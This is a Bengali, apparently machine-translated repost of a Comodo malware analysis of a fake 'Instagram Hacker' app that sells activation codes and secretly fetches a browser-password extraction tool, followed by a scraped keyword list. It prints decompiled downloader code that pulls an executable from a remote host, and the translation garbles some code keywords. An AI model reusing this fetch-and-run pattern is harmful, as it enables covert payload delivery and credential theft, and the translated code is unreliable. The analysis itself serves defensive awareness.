পড়ার সময়: 4 মিনিট
অনেক লোক সম্ভাব্য অনাকাঙ্ক্ষিত অ্যাপ্লিকেশন (PUA) কে গুরুতর বিপদ হিসাবে নেয় না। এই ধরনের বেপরোয়া মনোভাবের কারণ হল যে PUA সাধারণত ব্যবহারকারীর সম্মতিতে ইনস্টল করা হয়। কিন্তু এই মতামত একটি বড় ভুল। এবং শুধুমাত্র এই কারণেই নয় যে একটি PUA গোপনে অন্যান্য প্রোগ্রাম যেমন অ্যাডওয়্যার বা স্পাইওয়্যার ড্রাইভ-বাই ডাউনলোডের ভিত্তিতে ইনস্টল করতে পারে। প্রাণবন্ত উদাহরণ নীচে কমোডো থ্রেট রিসার্চ ল্যাব দ্বারা বিশ্লেষণ করা হয়েছে বিশেষজ্ঞরা স্পষ্টভাবে দেখান যে একটি PUA অনেক বেশি হুমকির অস্ত্র হতে পারে।
“Instagram Hacker” নামের সফটওয়্যারটির সাথে দেখা করুন। এটির অফিসিয়াল ওয়েবসাইট রয়েছে https://hackinstagram.net/ এবং প্রতিশ্রুতি দেয় ... যে কোনও ইনস্টাগ্রাম অ্যাকাউন্ট হ্যাক করার। আরও, আপনি এটি বিনামূল্যে ডাউনলোড এবং ইনস্টল করতে পারেন।
ইনস্টলেশনের পরে, এটি একটি Instagram প্রোফাইল URL লিখতে এবং পাসওয়ার্ড হ্যাক করতে অনুরোধ করে।
ফলাফল কয়েক সেকেন্ডের মধ্যে আসে:
কিন্তু "পাসওয়ার্ড দেখুন" বোতামে ক্লিক করার পরে, একটি নতুন উইন্ডো প্রদর্শিত হবে:
"একটি অ্যাক্টিভেশন কোড পান" বোতামে ক্লিক করা "পেজ কিনুন" এ পুনঃনির্দেশিত হয়।
এটি "অ্যাক্টিভেশন কোড" কেনার প্রস্তাব দেয় কিন্তু … আপনি কি বাতাসে প্রতারণার গন্ধ পেতে পারেন? এটা স্পষ্ট যে, সেকেন্ডের জন্য ইনস্টাগ্রাম পাসওয়ার্ড ভাঙতে সক্ষম কোনো সফ্টওয়্যার বিদ্যমান থাকতে পারে না। তাহলে ইনস্টাগ্রাম হ্যাকার কি সিম্পলটনকে ফাঁকি দেওয়ার আরেকটি প্রতারণার হাতিয়ার? এটি পরীক্ষা করার সর্বোত্তম উপায় হল অ্যাপ্লিকেশন কোডের ভিতরে তাকানো।
কোডটি ডটনেট রিঅ্যাক্টর দিয়ে সুরক্ষিত কিন্তু de4dot টুল দিয়ে ডিকোড করা যায়।
এবং এখন আমরা নিশ্চিতভাবে দেখতে পাচ্ছি যে অ্যাপ্লিকেশনটি প্রতারণার একটি হাতিয়ার। কোডের প্রথম খণ্ডটি কেবল অগ্রগতি প্রদর্শন সূচককে জাল করে।
তবে আরেকটি আরও আকর্ষণীয়। আপনি দেখতে পাচ্ছেন, এতে সক্রিয়করণ সফল হলে ডাউনলোড করার জন্য এক্সিকিউটেবল সহ একটি URL রয়েছে।
লোড হচ্ছে উইন্ডো()
{
Class2.qDiUy7EzyuIMj();
this.filename = "view.exe";
this.uri = নতুন Uri("http://software-logistics.net/external/component/download/view.exe");
this.Initialize Component();
যদি (File.Exists(this.filename))
{
File.Delete(this.filename);
}
চেষ্টা
{
WebClient ক্লায়েন্ট1 = নতুন WebClient();
client1.DownloadFileAsync(this.uri, this.filename);
client1.DownloadProgressChanged += new DownloadProgressChangedEventHandler(this.method_1);
client1.DownloadFileCompleted += new AsyncCompletedEventHandler(this.method_2);
}
দঙ্গল
{
this.method_0();
}
}
}
}
যদি আমরা এক্সিকিউটেবল চালাই, আমরা খুঁজে পাব যে এটি NirSoft থেকে WebBrowserPassView অ্যাপ্লিকেশন:
https://www.nirsoft.net/utils/web_browser_password.html
WebBrowserPassView হল একটি পাসওয়ার্ড নিষ্কাশন টুল যা ওয়েব ব্রাউজার দ্বারা সংরক্ষিত পাসওয়ার্ড প্রকাশ করে। সুতরাং এই সফ্টওয়্যারটি যে সমস্ত পাসওয়ার্ড বের করতে পারে তা ইনস্টাগ্রামের নয় বরং ব্যবহারকারীদের নিজস্ব পাসওয়ার্ড তাদের ব্রাউজারে রাখা!
আবার শুরু করা যাক: ইনস্টাগ্রাম হ্যাকার যা করে তা হল NirSoft থেকে অন্য PUA ডাউনলোড এবং চালু করা। তাই আমরা স্পষ্টতই একটি জালিয়াতির হাতিয়ারের মুখোমুখি হচ্ছি। এখানে কারসাজিমূলক মনস্তাত্ত্বিক কৌশলটি লক্ষ্য করুন: যদি একজন ভুক্তভোগী জানতে পারে যে সে প্রতারিত হয়েছে, সে খুব কমই ঘটনাটি সম্পর্কে পুলিশকে রিপোর্ট করে। কারণ সেক্ষেত্রে, তাকে ইনস্টাগ্রাম হ্যাক করার চেষ্টায় স্বীকার করতে হবে, এটি একটি সাইবার ক্রাইম করার একটি কাজ।
কিন্তু এটি প্রান্তের একটি পাতলা শেষ।
সবচেয়ে বিপজ্জনক হুমকি হ'ল অ্যাপ্লিকেশনটির URLটি একটি ক্ষতিকারক ফাইল দিয়ে সহজেই অন্য যে কোনও জায়গায় পরিবর্তন করা যেতে পারে যা শিকারের মেশিনে কার্যকর করা হবে। তাই এই PUA - সেইসাথে এই ধরনের ম্যালওয়্যার টাইপের আরও অনেক উদাহরণ - বিভিন্ন "ভারী" ম্যালওয়্যার যেমন ট্রোজান, ব্যাকডোর, এর ব্যাপক বিস্তারের জন্য ব্যবহার করা যেতে পারে। ransomware ইত্যাদি।
এবং এটি PUA কে সত্যিই বিপজ্জনক ম্যালওয়্যার হিসাবে নেওয়ার একটি ভাল কারণ। কারণ এটি একটি বিধ্বংসী বিশাল সাইবার আক্রমণের জন্য একটি স্প্রিংবোর্ড হতে পারে।
“আজ আমাদের বিবেচনা করা উচিত নয় ম্যালওয়্যার যেমন বিপজ্জনক বা তেমন বিপজ্জনক নয়, "কমোডো থ্রেট রিসার্চ ল্যাবসের প্রধান ফাতিহ ওরহান বলেছেন। “যেকোনো ম্যালওয়্যার একটি বিচ্ছিন্ন স্থানে বিদ্যমান নয়। আজকাল সাইবার অপরাধীরা ব্যবহারকারীদের আক্রমণ করার জন্য দীর্ঘ ম্যালওয়্যার চেইন তৈরি করে এবং, আপনি দেখতে পাচ্ছেন, PUA এই ধরনের একটি হত্যা চেইনের একটি লিঙ্ক হতে পারে। তাই আমরা কোদাল একটি কোদাল কল করা উচিত. হ্যাঁ, এই অ্যাপ্লিকেশানগুলি ডাউনলোড করা হয় এবং ব্যবহারকারীদের অনুমোদন নিয়ে চালানো হয় কিন্তু, এই ক্ষেত্রে, অনুমোদনটি জালিয়াতির মাধ্যমে ছিনিয়ে নেওয়া হয়৷ সম্ভাব্য অবাঞ্ছিত অ্যাপ্লিকেশনগুলি বৈধ হওয়ার ভান করে, প্রত্যেকের বুঝতে হবে এটি কেবল একটি ছদ্মবেশ। এই কারণেই কমোডো শুধুমাত্র উচ্চ-সম্পন্ন প্রযুক্তিগত সুরক্ষা প্রদান করে না বরং নিয়মিতভাবে ব্যবহারকারীদের সাইবারস্পেসে বিপজ্জনক ফাঁদ থেকে বিরত রাখতে জানায়”।
কমোডোর সাথে নিরাপদে বাস করুন!
সম্পর্কিত সম্পদ
উইকিপিডিয়া DDOS আক্রমণ
ম্যালওয়্যার অপসারণ
ওয়েবসাইট ম্যালওয়্যার স্ক্যানার
সেরা ওয়েবসাইট নিরাপত্তা
ওয়ার্ডপ্রেস নিরাপত্তা
বিনামূল্যে পরীক্ষা শুরু করুন নিখরচায় আপনার ইনস্ট্যান্ট সুরক্ষা স্কোরকার্ড পান G
- এসইও চালিত বিষয়বস্তু এবং পিআর বিতরণ। আজই পরিবর্ধিত পান।
- প্লেটোব্লকচেন। Web3 মেটাভার্স ইন্টেলিজেন্স। জ্ঞান প্রসারিত. এখানে প্রবেশ করুন.
- উত্স: https://blog.comodo.com/comodo-news/how-unwanted-applications-are-greater-security-threat/
- a
- সক্ষম
- সম্পর্কে
- হিসাব
- আইন
- সক্রিয়করণ
- পর
- এয়ার
- সব
- এবং
- অন্য
- আবেদন
- অ্যাপ্লিকেশন
- অনুমোদন
- আক্রমণ
- মনোভাব
- পিছনে
- ভিত্তি
- কারণ
- সর্বোত্তম
- বিশাল
- ব্লগ
- বিরতি
- ব্রাউজার
- নির্মাণ করা
- বোতাম
- কেনা
- কল
- কেস
- চেন
- চেইন
- চেক
- পরিষ্কারভাবে
- কোড
- সংগঠনের
- সম্মতি
- বিবেচনা
- ধারণ
- সাইবার আক্রমণ
- সাইবার অপরাধ
- cybercriminals
- বিপদ
- বিপজ্জনক
- DDoS
- বিধ্বংসী
- আবিষ্কার
- Dont
- ডবল
- ডাউনলোড
- সহজে
- প্রান্ত
- প্রবেশ করান
- ইত্যাদি
- ঘটনা
- উদাহরণ
- উদাহরণ
- বিশেষজ্ঞদের
- নির্যাস
- মুখ
- কয়েক
- ফাইল
- আবিষ্কার
- প্রথম
- প্রতারণা
- বিনামূল্যে
- থেকে
- পাওয়া
- ভাল
- বৃহত্তর
- টাট্টু ঘোড়া
- হ্যাকার
- মাথা
- এখানে
- কিভাবে
- কিভাবে
- এইচটিএমএল
- HTTPS দ্বারা
- in
- ঘটনা
- ইনডিকেটর
- ইনস্টাগ্রাম
- ইনস্টল
- তাত্ক্ষণিক
- মজাদার
- ভিন্ন
- IT
- ল্যাবস
- চালু করা
- LINK
- দীর্ঘ
- দেখুন
- মেশিন
- ম্যালওয়্যার
- ম্যালওয়ার আক্রমণ
- অনেক
- বৃহদায়তন
- সর্বোচ্চ প্রস্থ
- ভুল
- অধিক
- সেতু
- নামে
- চাহিদা
- নতুন
- সুস্পষ্ট
- অফার
- কর্মকর্তা
- সরকারী ওয়েবসাইট
- ONE
- অভিমত
- অন্যান্য
- নিজের
- পাসওয়ার্ড
- পাসওয়ার্ড
- সম্প্রদায়
- পিএইচপি
- Plato
- প্লেটো ডেটা ইন্টেলিজেন্স
- প্লেটোডাটা
- পুলিশ
- সম্ভাব্য
- প্রতিরোধ
- প্রোফাইল
- প্রোগ্রাম
- উন্নতি
- প্রতিশ্রুতি
- রক্ষিত
- রক্ষা
- প্রদান
- সাধা
- কারণ
- বেপরোয়া
- নিয়মিতভাবে
- প্রতিবেদন
- গবেষণা
- ফল
- জীবনবৃত্তান্ত
- প্রকাশিত
- পরিত্রাণ
- চালান
- স্কোরকার্ড
- সেকেন্ড
- নিরাপদ
- নিরাপত্তা
- গম্ভীর
- উচিত
- So
- সফটওয়্যার
- স্থান
- স্পাইওয়্যার
- সঞ্চিত
- সফল
- এমন
- গ্রহণ করা
- কারিগরী
- সার্জারির
- তাদের
- হুমকি
- সর্বত্র
- সময়
- থেকে
- টুল
- যাত্রীর সঙ্গের নিজলটবহর
- চালু
- বোঝা
- অনাবশ্যক
- URL টি
- ব্যবহারকারী
- ব্যবহারকারী
- সাধারণত
- বিভিন্ন
- শিকার
- চেক
- ওয়েব
- ওয়েব ব্রাউজার
- ওয়েবসাইট
- ইচ্ছা
- would
- আপনি
- আপনার
- zephyrnet